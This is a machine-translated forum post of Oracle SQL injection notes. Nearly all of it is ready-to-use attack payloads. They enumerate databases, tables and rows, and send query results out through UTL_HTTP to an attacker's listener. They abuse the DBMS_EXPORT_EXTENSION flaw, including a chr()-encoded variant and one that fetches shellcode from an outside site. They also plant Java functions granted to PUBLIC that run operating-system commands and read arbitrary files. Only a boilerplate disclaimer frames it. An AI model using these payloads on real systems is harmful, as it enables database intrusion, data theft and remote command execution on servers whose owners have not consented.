This article is a mirror article of machine translation, please click here to jump to the original article.

Architect_Programmer_Code Agriculture Network»Architect Other Technologies Safe offense and defense SQL injection notes oracle
View: 11931|Reply: 0

[Safe Communication] SQL injection notes oracle

[Copy link]
Posted on 1/24/2015 12:58:17 PM | | |
This post was last edited by test on 2015-1-24 13:01

Comment: --
Multiple sentence execution is not supported, and federated queries are supported
Database names, table names, and column names are all capitalized.


length(field)
ascii(substr(field, N, 1))


and (select count(*) from dual)>0 -- Determine whether it is oracle or not

order by n--

and 1=2 union select null, null,.....,null from dual-- replace null with N or 'N'

and 1=2 union select null, (sql statement) ,.....,null from dual -- change to (sql statement) at 'N'

and (select count(*) from all_objects where object_name='UTL_HTTP')>0 -- Determine whether the UTL_HTTP is supported (the export IP is known)

and UTL_HTTP.request('http://LocalIP:port'|| (SQL statement)) =1-- Remotely send messages to local, local listening nc -vv -l -p 1234


SQL statements
Select banner from sys.v_$version where rownum=1 to query the oracle version
select member from v$logfile where rownum=1 Query the log file path (Windows or Linux)
select utl_inaddr.get_host_address from dual to query the database listening IP
Select instance_name from v$instance to query the sid
select name from v$database Query the current database name
select sys_context ('userenv','current_user') from dual query database users
select * from session_roles where rownum=1 to query the current user permissions
select * from session_roles where rownum=1 [and role<>'first permission name']



select table_name from user_tables where rownum=1 The first table segment of the current database
select table_name||','|| tablespace_name from user_tables where rownum=1 First table segment, database (for verification, it may not be v$database)
select table_name from user_tables where rownum=1 and table_name<>'first table segment' The second table segment of the current database

select column_name from user_tab_columns where rownum=1 and table_name='Table Segment' The first field corresponding to the table name
select column_name from user_tab_columns where rownum=1 and table_name='Table segment' and column_name<>'First field' The second field corresponding to the table name

select field from table segment where rownum=1 violates the first line content
select field from table segment where rownum=1 and field <> 'first line content' exposes the second line content


Cross-library
select owner from all_tables where rownum=1 queries the first database name
select owner from all_tables where rownum=1 and owner<> 'First database name' to query the second database name

select table_name from all_tables where rownum=1 and owner='database name' Query the first table name of the corresponding database
select table_name from all_tables where rownum=1 and owner='database name' and table_name<>'first table name' to query the second table name of the corresponding database

select column_name from all_tab_columns where rownum=1 and owner='database name' and table_name='table segment' The first field corresponding to the table name
select column_name from all_tab_columns where rownum=1 and owner='database name' and table_name='table segment' and column_name<>'first field' The second field corresponding to the table name

select field from database. table segment where rownum=1 violates the content of the first line
select field from database. The table segment where rownum=1 and field <> 'First Line Content' violates the second row content





SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); multi-statement END; --','SYS',0,'1',0)--

If 'is escaped, chr() is used.

SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES(chr(70)|| chr(79)|| chr(79),chr(66)|| chr(65)|| chr(82), chr(68)|| chr(66)|| chr(77)|| chr(83)|| chr(95)|| chr(79)|| chr(85)|| chr(84)|| chr(80)|| chr(85)|| chr(84)|| chr(34)|| chr(46)|| chr(80)|| chr(85)|| chr(84)|| chr(40)|| chr(58)|| chr(80)|| chr(49)|| chr(41)|| chr(59)|| Multi-statement || chr(69)|| chr(78)|| chr(68)|| chr(59)|| chr(45)|| chr(45),chr(83)|| chr(89)|| chr(83),0,chr(49),0)=0--

If multiple sentences are too long, you can write the statement to the website file and use utl_http.request to retrieve it.

SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); utl_http.request('http://www.guetsec.com/shellcode.txt'); --','SYS',0,'1',0)--





Create a JAVA package SecTest
runCMD is used to execute system commands
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String runCMD(String args){try{BufferedReader myReader=new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args) .getInputStream())); String stemp,str=""; while((stemp=myReader.readLine())!=null) str+=stemp+"\n"; myReader.close(); return str; }catch(Exception e){return e.toString(); }}}''''; END; ''; END; --','SYS',0,'1',0) from dual)--

readFile is used to read the file
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String readFile(String filename){try{BufferedReader myReader=new BufferedReader(new FileReader(filename)); String stemp,str=""; while((stemp=myReader.readLine())!=null) str+=stemp+"\n"; myReader.close(); return str; }catch(Exception e){return e.toString(); }}}''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Grant Java permissions
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''',''''''''SYS:java.io.FilePermission'''''''',''''''''<<ALL FILES>>'''''''',''''''''execute''''''''); end; ''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Create a function
SecRunCMD function
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''create or replace function SecRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''SecTest.runCMD(java.lang.String) return String'''''''' ; ''''; END; ''; END; --','SYS',0,'1',0) from dual)--

SecReadFile function
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''create or replace function SecReadFile(filename in varchar2) return varchar2 as language java name''''''''SecTest.readFile(java.lang.String) return String' '''''''; ''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Grant permission to execute the public function
SecRunCMD is granted permissions
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant all on SecRunCMD to public''''; END; ''; END; --','SYS',0,'1',0) from dual)--

SecReadFile
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant all on SecReadFile to public''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Detects whether the function was created successfully
and (select count(*) from all_objects where object_name='SECRUNCMD')>0--
and (select count(*) from all_objects where object_name='SECREADFILE')>0--



Execute the command
and '1'<>(select sys. SecRunCMD('Execute command') from dual)--
and '1'<>(select sys. SecReadFile('file physical address') from dual)--
or
and 1=2 union select null,...,sys. SecRunCMD('execute command'),...,null from dual--
and 1=2 union select null,...,sys. SecReadFile('file physical address'),...,null from dual--
or
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'|| REPLACE(REPLACE(sys. SecRunCMD('Execute Command'),' ',' '),'\n',' ')) from dual)--
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'|| REPLACE(REPLACE(sys. SecReadFile('File Physical Address'),' ',' ','\n',' ')) from dual)--



Delete function
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''drop function SecRunCMD''''; END; ''; END; --','SYS',0,'1',0) from dual)--
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''drop function SecReadFile''''; END; ''; END; --','SYS',0,'1',0) from dual)--




Previous:Can I apply for moderation, what conditions do I need?
Next:ORALCE obtains the hostname and IP address

Related Posts
Disclaimer:
All software, programming materials or articles published by Code Farmer Network are only for learning and research purposes; The above content shall not be used for commercial or illegal purposes, otherwise, users shall bear all consequences. The information on this site comes from the Internet, and copyright disputes have nothing to do with this site. You must completely delete the above content from your computer within 24 hours of downloading. If you like the program, please support genuine software, purchase registration, and get better genuine services. If there is any infringement, please contact us by email.
Mail To:help@itsvse.com